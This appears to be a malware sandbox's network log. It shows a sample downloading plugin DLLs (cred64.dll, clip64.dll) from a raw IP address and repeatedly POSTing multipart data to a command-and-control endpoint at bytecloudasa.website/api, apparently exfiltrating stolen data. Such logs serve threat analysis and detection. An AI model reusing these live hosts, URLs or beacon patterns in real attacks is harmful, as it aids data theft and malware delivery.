Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F08j2Tt9eCwO6i1SmXcbsEM7bqTL%2F3EngwMamj%2Fg8dKs2Q3o1k8yeosd9OVpfBfr9ofDKzwx9veXtiHo9ndo5QwCl9boKLRTAKTkGmu1SJ7JiSlJ%2BY3k4ExJZgGCLWCfEPesv6NlQw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c523bce91cb0-AMS
GET

http://77.91.124.1/theme/Plugins/cred64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/cred64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:35:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET

http://77.91.124.1/theme/Plugins/clip64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/clip64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
ETag: "16400-60691507c5cc0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=aalmp82h18p90jhnt0oa5vbv50; expires=Sun, 04 Feb 2024 02:22:09 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:30 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b7H0NaqjO8BsYAt8GDeRolV2ndsjPvDBgYT%2FnkfMAbwVGqX0bluCxuuxjLyPaVw8Ui8MbFm2%2FZliJZKLYh8ZGXGsFtppEGoDuMCVoq5r3I39lMdzGoEq9k4zZ954Q%2B6%2FycgZ2Lg1Rg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c524be50b748-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=t9mtvcallnlnhqvp241cibl7ih; expires=Sun, 04 Feb 2024 02:22:09 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:30 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IUgOVTrA8uPUvyM2uHctkljmlHnpnsDHTRYzGPNAjqutRtUpEcilShtXRoQeCOmPCl2YYtIM6m7LxOZctL1HGGdgYfCFFM8y4%2FhqRbAwc2voeeQOvmIMXAEA%2F9PNWXMoc0vpmfwwUA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c52619eb06c8-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=9iausigl2cg4vov5i6msl33818; expires=Sun, 04 Feb 2024 02:22:10 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:31 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7kepuhkWTJUDLTAj0onoHcdfbcgcrRxCEstjIi5Gb3EcqdwpSMwcN3KHEh%2FTDs3cHJHrKXjPfodR%2F5EAfQR3k%2BR%2B8BXG6zkxgw8AFm2A%2B4XoLQNRVa6k%2F3wgDd3JaVoPobr1GKJ1OA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5272a6cb94a-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=r9skd121n6t335h1off3ek3a6e; expires=Sun, 04 Feb 2024 02:22:10 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:31 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k%2BQAHfL90pdEteMm%2Fv6FUcaLbgAofWPuJCwgY7K4lkWIjFTs%2BwuaeN0%2FOQJOuYbOcpjeTKFYUhqqkjWnGzJMsUHKG%2ByFK5GOXYQDyz9XDwKzJPnjZKPxCYbKhn8OvTPupmw%2Be4XF4g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5291c280e31-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=71sjvpk3ikq85em3csd8fttn6f; expires=Sun, 04 Feb 2024 02:22:10 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:31 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Zq0NDrXNzveO%2BRLb2eK%2FofnJjeZqGO0jqFf04oK3IYDB6muaWThBg7Kf1SyOHnStvxVpqEG10ij5w0re%2B0ntvPCezz6axK7qvpJsM5j2OsJDPlCZxCKuR3NHoKGuRduOaeKspulRlA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c52aed8f6626-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 16142
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=8n0ldsbs6g70if9clts727n8rs; expires=Sun, 04 Feb 2024 02:22:11 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:32 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MP3ddVu%2FjrCYIk6hl0x6V9tT08rSw8PxapJn%2Byp8tbbz1N%2FObSP%2FojGTxPtV%2FuyZtJyjsxFYok%2Fz56mfFiH1BnFoFenSxGzwg8WkOgaGH6rDhxxA3KWWfp7qGvIxBM7O3gNYzjL70w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c52f394c0e3b-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=6u993g0umm9oefv3ft312gbe14; expires=Sun, 04 Feb 2024 02:22:11 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:32 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eJjMpCJ7EN6CJYJ0ogsJnkVJqMPsAlMaGnS0arI0VKCZtMnAvZ3%2B3rxqCkjgN0dxKD9MilNHJYNXaFnkoaL9BhTA1RwlctcuUUK4RgG75JjX1g0yIknok4kpbRzcOH%2BzWRmbymhDMw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c531af2cb8c4-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=pet0p63g6f84egen0jpco71vg2; expires=Sun, 04 Feb 2024 02:22:12 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:33 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=07jUWsb1NmOE92WJ%2FI7ghKV7aCIS2NkWJ8%2Fk5EoPwSmKTx1yjepcEYTv%2Bb%2BmgCElM8be2OhmXzLU9SSs6YqCnhBob4Z9YbUMEK0C%2BkVZlSay2v4V6mxB2gsykbjKE0T1KcmG8fOpdg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c533bf1eb936-AMS
DNS

host-file-host6.com

Remote address:

8.8.8.8:53

Request

host-file-host6.com

IN A

Response
DNS

host-file-host6.com

Remote address:

8.8.8.8:53

Request

host-file-host6.com

IN A

Response
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=14bog2hheuoiv6ub5pl3dg3kr2; expires=Sun, 04 Feb 2024 02:22:13 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:34 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e5sLWm%2FxtW7oRR4uk0Ch6tCETDM9bykremrIAO9sY4Gwsf%2BMCRptqYygrAR7OXRnvUm5Wb3g%2F6jijmB7Nhg7mS9N2tlaMRyLpsevYvxCjBxMfXg3yaSKwV7RCxopElQGTywd2tAWhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5395e925c40-AMS
DNS

host-host-file8.com

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

194.169.175.127
POST

http://host-host-file8.com/

Explorer.EXE

Remote address:

194.169.175.127:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rirqhkcn.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 151
Host: host-host-file8.com

Response

HTTP/1.1 200 OK

Server: nginx/1.20.2
Date: Wed, 11 Oct 2023 08:35:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=llfro4iklb9li59uroip3kqf02; expires=Sun, 04 Feb 2024 02:22:15 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:36 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qbSM3wPpXJpW7vZp8qPSl3wytB2qEoEV6bi9JLKdU9Ll597FYAWIMs9Z4pfcn1jvKOT0Fh65vOahhxzw786%2BxOOxvmJjNtPoHV4FH8yW77mz2i6NsYFxU0rLQ2LAdDY3xFqQsitvQw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c53cfbf71cc2-AMS
DNS

127.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.175.169.194.in-addr.arpa

IN PTR

Response
DNS

127.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.175.169.194.in-addr.arpa

IN PTR

Response
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=eq1qd7iecicgv2fp4ajibv500k; expires=Sun, 04 Feb 2024 02:22:16 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:37 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=abKRDtwVy0PqQljhF7naDER4sw0BNF%2BW0PEeD16RWPII6w8lmunOo7GWMt67v73QvUfRf6w%2BjrW0rJYOPOwSPtsGbph371GpdDp0CoFFpN3eGSB0vgAe0BPkZjtWcQBHW1CAcwaZBw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5495e87b6fe-AMS
DNS

bytecloudasa.website

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

bytecloudasa.website

IN A

Response

bytecloudasa.website

IN A

104.21.61.162

bytecloudasa.website

IN A

172.67.212.39
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=0g5r0bn19vcru7b8tt2d5pnrmc; expires=Sun, 04 Feb 2024 02:22:18 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:39 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qbc%2BDwXQy7FYa1C1dkVzZ%2FbHJKlLLn%2FuHydSxAPLVgJIONOcrwTQ%2BC6SDDDa%2F%2Fx8UgtxwJe3tAvwsLc%2FyXKJCjv61itZSNb7jWN8M6MwcZXv5fqVga7YQOerMWh4Ow5lgDWTdDIYgw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5521a0b0b05-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=1baop5h0gr8e994r101f3nti45; expires=Sun, 04 Feb 2024 02:22:19 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:40 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u8ymvD3LFl4QMO%2BgSiTAWJSgeyDCMnkt%2BseZv8zPMY%2FEPQ5zfj4YjJwt8aKtvgck8Hc6L4pdhyS%2FFA91%2FkPX%2FV9pfzcTKUVvhQoSOx3g6Lo2wRAG0yYWJZKq0xsZ4TQkSWMGQZhTJg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c559dbb5662c-AMS
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301312_1T9ZATUOGPW0HJ7P7&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301312_1T9ZATUOGPW0HJ7P7&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 506566
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
